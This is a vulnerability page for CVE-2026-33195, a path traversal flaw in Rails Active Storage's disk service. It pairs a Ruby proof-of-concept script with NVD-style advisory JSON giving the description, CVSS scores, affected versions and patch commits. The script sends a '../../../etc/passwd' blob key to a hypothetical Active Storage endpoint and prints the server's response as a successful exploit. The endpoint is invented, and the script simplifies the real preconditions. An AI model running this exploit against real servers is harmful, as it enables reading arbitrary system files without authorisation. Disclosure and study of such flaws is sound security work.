CVE-2026-33195

# Conceptual Proof of Concept for CVE-2026-33195 # This demonstrates how a malicious blob key can lead to path traversal. require 'net/http' # Target URL (hypothetical endpoint that processes blob keys) url = 'http://vulnerable-rails-app.com/rails/active_storage/disk' uri = URI(url) # Construct a malicious payload # The 'key' parameter often expects a UUID, but if it accepts user input: # Using '../' sequences to traverse out of the storage root malicious_key = '../../../etc/passwd' # Request parameters params = { 'key' => malicious_key, 'content_type' => 'text/plain' } begin # Sending the request response = Net::HTTP.post_form(uri, params) # If the vulnerability exists, the server may respond with the content of /etc/passwd if response.code == '200' puts "[+] Exploit Successful!" puts "[+] Response Body:" puts response.body else puts "[-] Exploit Failed or Patched. Status: #{response.code}" end rescue StandardError => e puts "[-] Error: #{e.message}" end

{"cve": {"id": "CVE-2026-33195", "sourceIdentifier": "[email protected]", "published": "2026-03-24T00:16:28.987", "lastModified": "2026-03-24T17:55:45.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Active Storage allows users to attach cloud and local files in Rails applications. Prior to versions 8.1.2.1, 8.0.4.1, and 7.2.3.1, Active Storage's `DiskService#path_for` does not validate that the resolved filesystem path remains within the storage root directory. If a blob key containing path traversal sequences (e.g. `../`) is used, it could allow reading, writing, or deleting arbitrary files on the server. Blob keys are expected to be trusted strings, but some applications could be passing user input as keys and would be affected. Versions 8.1.2.1, 8.0.4.1, and 7.2.3.1 contain a patch."}, {"lang": "es", "value": "Active Storage permite a los usuarios adjuntar archivos locales y en la nube en aplicaciones Rails. Antes de las versiones 8.1.2.1, 8.0.4.1 y 7.2.3.1, 'DiskService#path_for' de Active Storage no valida que la ruta del sistema de archivos resuelta permanezca dentro del directorio raíz de almacenamiento. Si se utiliza una clave de blob que contiene secuencias de salto de ruta (por ejemplo, '../'), podría permitir la lectura, escritura o eliminación de archivos arbitrarios en el servidor. Se espera que las claves de blob sean cadenas de confianza, pero algunas aplicaciones podrían estar pasando entradas de usuario como claves y se verían afectadas. Las versiones 8.1.2.1, 8.0.4.1 y 7.2.3.1 contienen un parche."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.3.1", "matchCriteriaId": "D9DC6CB9-DC6C-4CBB-9806-3936ADBC8F1B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4.1", "matchCriteriaId": "FA8791E1-8B96-43F6-A3EC-A7E60D700330"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.1.0", "versionEndExcluding": "8.1.2.1", "matchCriteriaId": "978E0135-D14B-41DE-87E4-CF059A23E189"}]}]}], "references": [{"url": "https://github.com/rails/rails/commit/4933c1e3b8c1bb04925d60347be9f69270392f2c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/rails/rails/commit/9b06fbc0f504b8afe333f33d19548f3b85fbe655", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/rails/rails/commit/a290c8a1ec189d793aa6d7f2570b6a763f675348", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/rails/rails/releases/tag/v7.2.3.1", "source" ... (truncated)